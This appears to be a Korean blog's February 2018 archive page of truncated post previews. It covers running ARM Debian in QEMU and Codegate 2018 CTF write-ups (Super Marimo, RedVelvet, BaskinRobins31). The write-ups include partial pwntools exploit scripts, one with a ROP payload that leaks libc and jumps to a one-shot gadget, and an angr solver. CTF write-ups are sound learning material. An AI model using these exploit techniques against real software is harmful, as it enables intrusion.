2018/02 썸네일형 리스트형 arm in qemu Qemu 에서 ARM debian 실행 # apt-get install qemu # wget https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2 # wget https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress # wget https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpress * CUI 환경 + 인터넷 사용 # qemu-system-arm -M vexpress-a9 \ -kernel vmlinuz-3.2.0-4-vexpress \ -initrd initrd.img.. 더보기 [Codegate 2018 CTF] Super Marimo # exploit.py from pwn import * from time import * def ShowMe(name, profile): p.sendline('show me the marimo') print p.recvuntil('>> ') p.sendline(name) print p.recvuntil('>> ') p.sendline(profile) print p.recvuntil('>> ') def View(index, data): p.sendline('V') print p.recvuntil('>> ') sleep(3) p.sendline(index) print p.recvuntil('>> ') p.sendline('M') print p.recvuntil('>> ') p.sendline(data) pr.. 더보기 [Codegate 2018 CTF] RedVelvet # exploit.py import angr def main(): proj = angr.Project('./RedVelvet', load_options={'auto_load_libs': False}) path_group = proj.factory.path_group(threads=4) path_group.explore(find=0x401631, avoid=(0x401621, 0x4016cb, )) return path_group.found[0].state.posix.dumps(1) if __name__=='__main__': print(repr(main())) 결과 값은 "What_You_Wanna_Be?:)_lc_la" 가 나오게 되는데, 게싱을 통해 아래와 같이 정확한 플래그 알아냈다. FLAG : .. 더보기 [Codegate 2018 CTF] BaskinRobins31 # exploit.py from pwn import * from time import * p = process('./BaskinRobins31') #p = remote('ch41l3ng3s.codegate.kr', 3131) sleep(0.3) print p.recv(1024) payload = str('3') + 'A'*183 payload += p64(0x40087a) + p64(0x1) + p64(0x602040) + p64(0x10) + p64(0x4006d0) payload += p64(0x4008a4) p.sendline(payload) data = p.recv(1024) read = u64(data[237:245]) libc = read - 0xf7250 oneshot = libc + 0x4.. 더보기 이전 1 다음